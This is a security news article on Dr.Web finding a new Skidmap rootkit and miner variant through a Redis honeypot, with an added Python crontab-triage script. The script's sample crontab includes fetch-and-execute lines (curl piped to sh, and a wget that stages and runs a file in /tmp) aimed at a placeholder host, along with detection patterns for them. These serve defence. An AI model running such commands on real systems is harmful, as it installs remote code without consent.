Attacker Bait: Server with Vulnerable Redis Database Version

Man

Dr.Web researchers, using a honeypot in the form of a Redis server with its protection disabled, uncovered a new modification of the rootkit that installs the Skidmap Trojan miner on compromised Linux machines.

Over the course of the year, between 10 and 14 thousand attacks were launched against the server each month, and recently the Skidmap malware was detected there, which is what the analysts had been counting on.

Although five years have passed since the Trojan first appeared, its mode of operation is unchanged: it is installed on the system by exploiting vulnerabilities or software misconfigurations.

Skidmap has a certain specialization and is found mainly in corporate networks, since stealth mining yields the greatest return in the enterprise segment.

Unexpectedly, in this case the cybercriminals used a new method to hide the miner's activity and installed four backdoors at once.

The attackers added tasks to the system cron scheduler that launched a script every 10 minutes to download the dropper Linux.MulDrop.142 (or its modification, Linux.MulDrop.143).

This executable file checks the OS kernel version, disables the SELinux security module, and then unpacks into the system the files of the Linux.Rootkit.400 rootkit, the Linux.BtcMine.815 miner, the Linux.BackDoor.Pam.8/9 and Linux.BackDoor.SSH.425/426 backdoors, and the Linux.BackDoor.RCTL.2 trojan.
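The cron persistence described above (a task firing every 10 minutes that fetches and runs a dropper) is one of the few parts of this chain that is visible before the rootkit is loaded, so a defender's first triage step is to scan crontabs for entries that combine a tight schedule with download-and-execute behaviour. The script below is an added example, not code from Dr.Web or from the analysed malware: it parses crontab text, works out the run interval for the simple schedule forms it understands, and flags entries that match two or more suspicious traits. The sample crontab, its hostnames and paths are constructed for illustration.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample crontab (illustrative only; hostnames are placeholders).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL http://placeholder.invalid/update.sh | sh
*/5 * * * * wget -q -O /tmp/.x http://placeholder.invalid/x && chmod +x /tmp/.x && /tmp/.x
15 4 * * 0 /usr/sbin/logrotate /etc/logrotate.conf
@hourly /usr/local/bin/backup.sh
"""

DOWNLOAD_TOOL = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")
SCRATCH_DIR = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/\S+")


@dataclass
class Finding:
    line_no: int
    schedule: str
    command: str
    interval_min: Optional[int]
    reasons: List[str] = field(default_factory=list)


def interval_minutes(schedule: str) -> Optional[int]:
    """Run interval in minutes for the schedule forms this triage understands:
    '*' or '*/N' in the minute field, or the @hourly shorthand.
    Other schedules (fixed times, day-of-week ranges) return None."""
    if schedule.startswith("@"):
        return {"@hourly": 60}.get(schedule)
    minute = schedule.split()[0]
    if minute == "*":
        return 1
    m = re.fullmatch(r"\*/(\d+)", minute)
    return int(m.group(1)) if m else None


def parse_crontab(text: str):
    """Yield (line_no, schedule, command) for each active crontab entry."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue  # malformed entry, ignore
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd.strip()


def triage(text: str, max_interval: int = 10) -> List[Finding]:
    """Flag entries that combine a tight schedule with download-and-execute traits.
    An entry is reported when at least two independent traits are present."""
    findings: List[Finding] = []
    for n, sched, cmd in parse_crontab(text):
        reasons = []
        iv = interval_minutes(sched)
        if iv is not None and iv <= max_interval:
            reasons.append(f"runs every {iv} min")
        if DOWNLOAD_TOOL.search(cmd):
            reasons.append("fetches remote content")
        if PIPE_TO_SHELL.search(cmd):
            reasons.append("pipes the download straight into a shell")
        if SCRATCH_DIR.search(cmd):
            reasons.append("stages or executes a file in a world-writable directory")
        if len(reasons) >= 2:
            findings.append(Finding(n, sched, cmd, iv, reasons))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: {f.schedule} {f.command}")
        print("    -> " + "; ".join(f.reasons))
```

On a live host the same `triage()` can be fed the output of `crontab -l` for each user plus the contents of `/etc/crontab` and `/etc/cron.d/*`; the two-trait threshold keeps ordinary maintenance jobs such as the certbot and logrotate entries in the sample from being reported.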

A distinctive feature of the dropper is its large size, since it contains executable files for various Linux distributions.

In this case, about 60 files were embedded in the body of the dropper for different versions of the Debian and Red Hat Enterprise Linux distributions, which are the ones most commonly installed on servers.

The observed rootkit takes the form of a malicious kernel module that hides the miner's activity by replacing the reported CPU load and network activity information.

The purpose of the backdoors installed by the dropper in the observed attack is to record and send data on all SSH logins to the attackers, as well as to create a master password for all accounts on the system.

To expand their control over the compromised system, the attackers install the Linux.BackDoor.RCTL.2 RAT, which lets them send commands to the compromised server and receive any data from it over a separate encrypted connection.

xmrig is installed as the miner; it can mine a number of cryptocurrencies, the best known of which is Monero.

The researchers note that detecting a miner concealed by a rootkit in a server cluster is a rather non-trivial task.

Without reliable information about resource consumption, the only indicators that can suggest a compromise are excessive power consumption and increased heat generation.